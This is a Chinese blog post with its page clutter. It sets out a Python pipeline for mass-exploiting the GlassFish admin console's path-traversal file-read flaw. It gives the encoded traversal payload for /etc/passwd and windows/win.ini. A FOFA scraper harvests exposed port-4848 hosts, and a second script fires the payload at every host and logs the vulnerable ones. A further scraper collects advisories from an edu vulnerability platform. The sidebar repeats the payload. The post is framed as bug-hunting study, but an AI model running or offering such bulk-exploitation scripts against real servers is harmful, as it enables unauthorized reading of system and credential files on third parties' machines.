Python开发-fofa批量挖掘glassfish-任意读取漏洞 (建议收藏学习!!!)

最新推荐文章于 2024-05-22 19:14:56 发布
最新推荐文章于 2024-05-22 19:14:56 发布
阅读量854 收藏 12
点赞数 6
分类专栏: python安全开发 文章标签: python 爬虫 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/120812887
版权

0x00 glassfish漏洞描述

漏洞分析:
glassfish是一款java编写的跨平台的开源的应用服务器。
与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造:

https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

0x01 fofa批量爬取目标IP

 -*- codeing = utf-8 -*-
@Time : 2021/10/17 16:19
@Author : Hsy
@File : fofa-glassfish.paqu.py
@Software: PyCharm

import requests
import base64
from lxml import etree
import time


search_data='"glassfish" && port="4848"'
headers={
    'cookie':'你的cookie',
}
for yeshu in range(1,6):
    url='https://fofa.so/result?page='+str(yeshu)+'&qbase64='
    search_data_bs=str(base64.b64encode(search_data.encode("utf-8")),"utf-8")
    urls=url+search_data_bs
    print(urls)
    try:
        print('正在提取第'+str(yeshu)+'页')
        result=requests.get(urls,headers=headers).content
        soup=etree.HTML(result)
        ip_data=soup.xpath('//span[@class="aSpan"]/a[@target="_blank"]/@href')
        ipdata='\n'.join(ip_data)
        print(ip_data)
        with open(r'ip.txt','a+') as f:
            f.write(ipdata+'\n')
            f.close()
        time.sleep(0.5)
    except Exception as e:
        pass

结果:

0x02 批量验证漏洞

# -*- codeing = utf-8 -*-
# @Time : 2021/10/17 17:14
# @Author : Hsy
# @File : yanzhen-glassfish-poc.py
# @Software: PyCharm
import requests
import base64
from lxml import etree
import time
import sys

payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

for ip in open('ip.txt'):
        ip=ip.replace('\n','')
        windows_url=ip+payload_windows
        linxu_url=ip+payload_linux

        try:
            vuln_code_l=requests.get(linxu_url).status_code
            vuln_code_w=requests.get(windows_url).status_code
            print("check->"+ip)
            if vuln_code_l==200 or vuln_code_w ==200:
                with open(r'vuln.txt','a+') as f:
                    f.write(ip)
                    f.close()
            time.sleep(0.5)
        except Exception as e:
            pass

漏洞验证:


下一步批量提交!!!

0x02 爬取edu漏洞公告:

批量爬取漏洞公告,为后续挖掘src做准备!

爬取代码1:

import requests,time
from lxml import etree

def edu_list(page):
    for page in range(1,page+1):
        try:
            url='https://src.sjtu.edu.cn/list/?page='+str(page)
            data=requests.get(url).content
            #print(data)
            soup = etree.HTML(data.decode('utf-8'))
            result = soup.xpath('//td[@class=""]/a/text()')
            #print(result)
            results = '\n'.join(result)
            resultss=results.split()
            print(resultss)
            for edu in resultss:
                with open(r'src.txt', 'a+',encoding='utf-8') as f:
                    f.write(edu+'\n')
                    f.close()
        except Exception as e:
            time.sleep(0.5)
            pass

if __name__ == '__main__':
    edu_list(10)


爬取代码2:

import requests
from lxml import etree

#yeshu=input("您要爬取多少页数:")
def src_tiqu(yeshu):
    for i in range(1,int(yeshu)):
        url='https://src.sjtu.edu.cn/list/?page='+str(i)
        print('提取->',str(i)+'页数')
        data=requests.get(url).content
        print(data.decode('utf-8'))
        soup = etree.HTML(data)
        result=soup.xpath('//td[@class=""]/a/text()')
        results = '\n'.join(result)
        resultss = results.split()
        for edu in resultss:
            print(edu)
            with open(r'src_edu.txt', 'a+', encoding='utf-8') as f:
                f.write(edu + '\n')
                f.close()

if __name__ == '__main__':
    yeshu = input("您要爬取多少页数:")
    src_tiqu(yeshu)

总结完毕,创作不易,有什么问题希望指点出来,希望师傅可以点赞!

交流学习:
博客:www.kxsy.work
SND社区:告白热

告白热
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
fofa爬虫漏洞平台好方法)
课嗨教育的专栏
05-01 2250
目录 说明: 代码 配置 说明: 支持多关键词爬虫,适合于rad+xray联动。 关键词一行一个,fofa.txt文本内容为关键词,target内容为结果,直接与Xray_Rad_Fusion放在同一个目录下执行即可联动。 代码 import requests,os,sys,base64,json,re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.url
fofa搜索漏洞技巧
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-08 3439
fofa搜索漏洞技巧整理,主要有以下十个方面:搜索HTTP响应头中含有"thinkphp"关键词的网站和IP;加上标题带有后台的;加上时间,现在新网站有thinkphp日志泄露的有很多; 搜索html正文中含有"管理后台"关键词的网站和IP body="管理后台"等。 fofa搜索漏洞技巧整理1、搜索HTTP响应头中含有"thinkphp"关键词的网站和IP。 header="thinkphp" && country="CN"
自动化批量漏洞(edu)
jennycisp的博客
08-14 235
本文使用到的工具步骤一:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享步骤二:步骤三:
漏洞挖掘fofa+xray
09-25
fofa+xray批量洞脚本,非常有用,fofa+xray批量洞脚本敬请期待特别好,fofa+xray批量洞脚本
SRC 漏洞挖掘:特定资产.(批量漏扫)(教育漏洞报告平台)
最新发布
网络安全领域___专研者.
05-22 485
SRC (Security Research Center) 漏洞挖掘是一种专门针对网站和应用程序安全漏洞进行发现和研究的活动。SRC 漏洞挖掘通常由安全研究人员或专业的安全团队执行,目的是及时发现和修复系统中存在的安全隐患,提高系统的整体安全性。这项工作对于保护网站和应用程序免受黑客攻击非常重要。
Python 渗透测试:漏洞批量搜索与利用.(GlassFish 任意文件读取
网络安全领域___专研者.
05-19 2198
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.
python脚本之批量提取fofa漏洞IP
Aesthetic99的博客
03-29 8979
python脚本之批量提取fofa漏洞IP 前言: 本次python脚本是通过学习小迪师傅的课程学习而来,由于现在的fofa改变域名为fofa.info,所以下文中的python脚本中的一些值是根据目前的fofa网站改写的 脚本:(poc.py) import requests import base64 import time import sys from lxml import etree def fofa_search(search_data, page_data): #search_d
基于Python实现的Grafanav8.*版本任意文件读取漏洞批量检测工具源码
09-20
基于Python实现的Grafanav8.*版本任意文件读取漏洞批量检测工具源码 FOFA语法 app="Grafana" && country="CN" && body="v8." 使用方法 1.将准备检测的IP地址放入ip.txt文件中 2.运行python3 exp.py
锐捷RG-UAC 账户硬编码漏洞批量检测exp
06-17
-u 指定单个url -l 指定url文件 fofa搜索 title="RG-UAC登录页面" && body="admin",获取相关资产后保存到txt文件,然后使用此脚本批量检测
第86天:SRC挖掘-教育行业平台&规则&批量自动化1
08-03
例如,可以使用Python-Fofa-Xray进行常规批量自动化扫描,Python-Fofa-Exploit进行定点批量自动化,以及Python-Fofa-平台默认口令安全批量自动化。这些工具结合了Fofa(网络资产搜索工具)和Xray(漏洞扫描工具)等...
EDU漏洞挖掘建议与方法
08-14
EDU 漏洞挖掘建议与方法 EDU 漏洞挖掘是指对教育机构网站或系统的漏洞挖掘,旨在发现潜在的安全漏洞,以便提前防患于未然,保障教育机构的信息安全。本篇文章将介绍 EDU 漏洞挖掘建议与方法,旨在帮助新手快速...
巧秒利用fofa挖到第一个漏洞
hackzkaq的博客
07-14 1万+
FOFA是一款非常强大的搜索引擎 关于对于fofa的描述是:FOFA(网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。 探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。 相对于shodan来说fofa的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。 fofa的功能这么强大,那我们要怎么利用好提供的功能来挖洞呢? fofa官方提供了一些基本语法: 图片 而真正
一条Fofa搜索语法,实现批量挖洞
qq_29737471的博客
03-24 8521
不过我认为我的学习时间还长,要尽量从基础学起,这就需要动手写写代码,理解那些工具底层用的什么逻辑。
开发实战(5)--fofa进行漏洞poc的信息收集
weixin_72543266的博客
04-21 2136
突破fafa信息采集时只能查看5页数据, 主要还是围绕渗透测试的流程进行开发,一般在信息收集后,在渗透测试后,在发现通用型漏洞时,我们为了节省时间,可以通过写批量脚本来信息收集,然后使用poc来进行批量验证.作为一个fofa工程师,那么我们当然是使用fofa进行信息搜集喽,刚好也借着这个机会熟悉一下fofa的API文档,为后面写利用工具做好铺垫,当然目前还是用不到API的,问就是用不起,所以只能写脚本突破注册会员限制进行信息爬取。
p77 Python 开发-批量 Fofa&SRC 提取&POC 验证
weixin_43263566的博客
03-07 1554
Python 开发-批量 Fofa&SRC 提取&POC 验证
Python开发-批量Fofa&POC验证
weixin_45357474的博客
03-02 1218
Python开发-批量Fofa&POC验证 学习目的:掌握利用公开或0day漏洞进行批量化的收集及验证脚本开发 首先有一个基本的漏洞是应用服务器glassfish任意文件读取漏洞漏洞标题写的是任意文件读取漏洞,其实该漏洞同样可以列出对应目录文件,基本上等同于源代码泄露,各种敏感信息暴露无遗。 Linux服务器会读取etc/passwd文件的内容 windows服务器会读取windows/win.ini文件的内容 4848端口为glassfish默认开放的web管理端口 首先去fofa搜索一波 “
漏洞批量利用扫描框架
热门推荐
Exploit的小站~
05-10 1万+
 0x00前言 每次漏洞爆发之后,很多人都在急着找批量,想着能多几个洞提交乌云上。其实有些漏洞的探测步骤很多时间是可以统一抽取做成框架的。今天我就分享一下自己写的一个漏洞批量利用的框架,运用这个框架,可以方便的进行一些漏洞批量扫描。 0x01框架的原理 漏洞的扫描一般都是URL链接挂载一个POC或者有人更狠直接上exp来尝试访问,如果服务器返回的页面中存在一些特征的字...
渗透测试-获取系统FOFA关键字来
aming小老弟
04-20 2587
如何获取FOFA语法关键字 有时候新爆出来的漏洞,想拿poc去一波,但是却不知道怎么用fofa去搜索 H3C为例 存在漏洞的页面是这样的,我们发现无法右键查看源码(也可以F12), 所以这个时候我们可以根据一些页面上存在的特征去找关键字。 根据url里的关键字进行搜索: 例如上图url中存在/imc/login.jsf, 这个路径可能就是这个产品所特有的路径, 我们可以直接把路径复制了粘贴在fofa中搜索(不是特别精准): 根据网站关键字搜索: fofa是支持搜索网站body的,这就说明我们可以根据网
python开发poc,fofa爬虫批量化扫洞
san3144393495的博客
04-07 701
学习使用python做到批量化的漏洞脚本1.通过fofa搜索结果来采集脚本2.批量化扫描漏洞---glassfish存在任意文件读取在默认48484端口,漏洞验证的poc为:"glassfish" && port="4848" && country="CN"http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae
fofa-collect怎么安装
10-01
Fofa-collect是一款用于fofa(一个专门用于搜索互联网开放设备的搜索引擎)数据收集的工具。下面是Fofa-collect的安装步骤: 第一步:安装Python 首先,你需要安装Python。你可以从Python官方网站下载合适的Python版本,并按照指示进行安装。确保将Python的路径添加到系统环境变量中。 第二步:安装依赖库 在安装Fofa-collect之前,你需要安装一些依赖库。打开终端或命令提示符窗口,使用pip命令安装所需的库: ``` pip install requests pip install jsonpath pip install termcolor ``` 第三步:下载并安装Fofa-collect 在Github上搜索“fofa-collect”,找到它的仓库,将代码下载到本地。你可以选择使用Git命令行工具进行下载,也可以直接下载ZIP压缩包并解压。 第四步:配置Fofa API 在Fofa的官方网站上注册并登录,获取到API的key。然后,在Fofa-collect的代码文件中找到并修改"config.py"文件,将获取到的API key填入到相应的位置。 第五步:运行Fofa-collect 在终端或命令提示符窗口中,切换到Fofa-collect代码所在的目录,运行以下命令来启动Fofa-collect: ``` python fofa-collect.py ``` 现在,你已经成功安装和运行了Fofa-collect。你可以根据实际需求来使用这个工具进行数据收集和分析。需要注意的是,合法合规的使用和遵守Fofa服务的条款是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值